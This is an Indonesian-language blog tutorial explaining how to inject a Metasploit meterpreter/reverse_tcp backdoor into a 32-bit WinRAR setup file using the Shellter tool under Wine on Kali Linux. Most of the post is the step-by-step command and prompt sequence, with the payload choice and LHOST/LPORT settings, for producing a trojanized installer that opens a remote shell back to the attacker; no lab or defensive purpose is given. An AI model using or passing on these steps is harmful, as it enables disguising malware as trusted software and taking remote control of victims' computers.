Membuat injection backdoor ke setup winrar32bit.exe dengan shellter di Kali Linux


hello guys bertemu kembali bersama saya Mr.gagaltotal666
huhh udah lama saya tidak menulis artikel tentang exploit backdoor
oke kali ini saya akan share bagaimana membuat backdoor
atau menginject backdoor ke dalam setup winrar32bit.exe
untuk os windows disini saya menggunakan exploit tools shellter
percobaan kali ini memakai setup32bit winrar kalau anda ingin
mencoba setup.exe lain selain winrar monggo di coba ^_^
dan shellter cuma mendukung setup nya yang 32bit saja
entah 64bit ia tidak mau, langsung saja ikuti langkah berikut

terlebih dahulu ambil shellter nya [disini] atau juga di web resmi nya [disini]

atau anda juga bisa langsung install shellter nya  :

" $ sudo apt-get install shellter "

download winrar nya yang akan di inject isi backdoor kita , klik [disini]
pas mau download winrar pilih yang 32bit yang berbahasa English
" English32bit.exe "

pertama buka terminal anda masing-masing, ketikan :

" $ cd Desktop "  >> folder shellter saya berada di Desktop

" $ cd shellter "

" $ wine shellter.exe "


setelah itu akan muncul " Choose Operation Mode - Auto/Manual "
pilih A

" $ Choose Operation Mode - Auto/Manual (A/M/H) : A "


disini masukan setup winrar32bit.exe nya ke "PE Target"
oh iya sebelum itu hasil download setup winrar32bit.exe nya
anda pindahkan ke bagian folder shellter nya

" $ PE Target : winrar32bit.exe "


enter dan tunggu proses nya
agak lumayan lama ^_^


jika sudah akan muncul seperti ini


nanti akan ada kata perintah " Enable Stealth Mode ? (Y/N/H) : "
pilih

" $ Enable Stealth Mode ? (Y/N/H) : N "  > seperti gambar diatas^

setelah itu akan disuruh masukan Payload 
pilih L jika ada perintah seperti ini :

" $ use a listed payload or custom ? (L/C/H) : L "

dan selanjutnya masukan perintah jika ada muncul seperti ini :

" $ select payload by index : 1 "> kenapa no 1 ? karena kita akan memilih payload" meterpreter/reverse_tcp " yang akan di jalankan di metasploit


kemudian akan di perintahkan masukan LHOST dan LPORT :

" $ SET LHOST 192.168.107.93 " > masukan IP anda

" $ SET LPORT 8080 " > disini saya menggunakan port 8080


dan enter jika sudah memasukan LHOST dan LPORT nya
tunggu hingga inject selesai
jika sudah selesai akan muncul seperti ini


jika sudah selesai di inject buka folder shellter anda akan terlihat
setup winrar32bit.exe sudah selesai di inject atau sudah di sisipkan backdoor


bagaimana cara menggunakan backdoor tersebut ?
gampang kok kita gunakan " Metasploit "
nanti saya akan melanjutkan nya setelah hari berikut nya
karena saya akan ada pelatihan Operator komputer ^_^

sekian tips nya dari saya ^_^ semoga bermanfaat

NB : YANG PLAGIAT COPY PASTE MUSNAH SANA !!

Post a Comment

0 Comments